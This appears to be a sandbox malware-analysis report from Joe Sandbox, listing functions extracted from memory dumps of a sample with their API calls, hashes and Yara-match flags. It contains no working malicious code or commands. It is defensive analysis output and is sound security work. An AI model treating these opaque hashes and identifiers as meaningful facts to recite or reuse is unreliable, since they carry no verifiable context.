Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D

Uniqueness

Uniqueness Score: -1.00%

Function 05B72607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction ID: 2f39edd191fd54a570c92915abb1c811a28ec953d0c55324fac530f7f1424a7c
Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction Fuzzy Hash: 90020B75E002199BDF14CFA9C980AADF7F1FF88314F1581AAD829E7384D731AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05B6CA63 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 05B6CAAA
@, xrefs: 05B6CA8A

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: d496a3c3c483910271fc93442288351b3e3e0859d1307156e40b0bf2bb77038d
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 59313C7614C1964FC715CB2DD8B85B6BF81FAC612072D43FAD1D68F25AD26DAC46C700

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7FC Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0040C823
@, xrefs: 0040C843

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C

Uniqueness

Uniqueness Score: -1.00%

Function 05B7B989 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,05B7B984,00000000,?,00000008,?,?,05B83766,00000000), ref: 05B7BBB6

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: b136ca5e7b3355e9635c455addf3da298b1434daece477fd1283dfc9da8ec4eb
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: 4FB139316146089FD719CF28C48AB657BE1FF45364F25C698E8AACF2A1D735E982CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0041B722 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05B807D5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FDF
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05B80829

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: a3ecf205f547aa61104667c81b925a43eb5a7b115932b567c3d1dba6ff3b641c
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: 4A21747261420E9BEB24BE24DC49F7A73A8EF44390F1011FAE915D6140E775F988CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042056E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05B8045D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 05B804CF

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: d1dad0edc087176ad74a43a1f135289fe7f2ddec48d442facdfa72e74bae8b8b
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 9A1159362007098FDB18BF39C898ABAB7A2FF80358B18443CE98647B00D371B442C740

Uniqueness

Uniqueness Score: -1.00%

Function 004201F6 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05B80A05 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,05B807A3,00000000,00000000,?), ref: 05B80A31

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 54619cb7cbdc52d264ec5a95161c3453a68fc8a36d9deef56e1f5edff74440bd
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 24F0F93261111AAFDB34BA64CC0DBBA7769FB40794F0514E9ED1AA3140EA74FE45C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 0042079E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 05B807D3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FDF
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05B80829

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction ID: d6ba77d00d493223bd44a1de02fde750c06aeaa86577a77db3a7c0717fe9cf3d
Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction Fuzzy Hash: C3F08132B51209ABDB14BF64DC49EBA73A8DB44350F0001F9E916DB240DA74BD49C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 05B804F8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 05B80544

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: 833f9d2bfefc0f19d8eb85d3addca2dafefa9350fd8a174bbf182324f824afb4
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 7FF0F4323003095FDB24BE399C88ABA7B91FB80398B0540A9E9068B540D671E845CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00420291 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14

Uniqueness

Uniqueness Score: -1.00%

Function 05B7774B Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,05B74002,?,00000004), ref: 05B7779E

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction ID: d12cda0c9645ea1adbac9e7c3ea85494b140965e92e2a36e5cb11c59ca2e7c11
Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction Fuzzy Hash: B6F06D3174121CBBDF11AF64EC05F7E7B66EB04B11F9001B9FC1966250CA716A249A99

Uniqueness

Uniqueness Score: -1.00%

Function 05B77358 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 05B71C62: RtlEnterCriticalSection.NTDLL(?), ref: 05B71C71

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 05B77390

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 051fb0ff92f28a6f4b8a5e6ea4bf261e9d5b978f534f4fc092b7bf7fd0f1e048
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: A4F04F32A503089FDB14EF78DC49B5D77F0EB04714F11516AF514DB2A0CF7469449B4A

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A

EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49

Uniqueness

Uniqueness Score: -1.00%

Function 05B80412 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 05B80449

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: fa49f86da3e328d87545ca81284dc789a1abd805940825d9cfc5542698ff79f6
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: 66F05C3530020957CB04BF35DC09B7A7FD1FFC1754B4A4099EE058B240C631A842C790

Uniqueness

Uniqueness Score: -1.00%

Function 004201AB Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754

Uniqueness

Uniqueness Score: -1.00%

Function 05B69E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,05B695DF), ref: 05B69E72

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 05B6F6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 05B6F818

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 579d29facf077766aef00f5492100953b4ad9333dd051a90c9b33ed3c9941cc2
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: 8C51426170964996DB388A7CB559BBE239BFB02200F1809DAD847CB29DC60DFA85C353

Uniqueness

Uniqueness Score: -1.00%

Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0040F5B1

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E

Uniqueness

Uniqueness Score: -1.00%

Function 00420AEA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE39 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108

Uniqueness

Uniqueness Score: -1.00%

Function 05B6C3F8 Relevance: .3, Instructions: 254COMMON

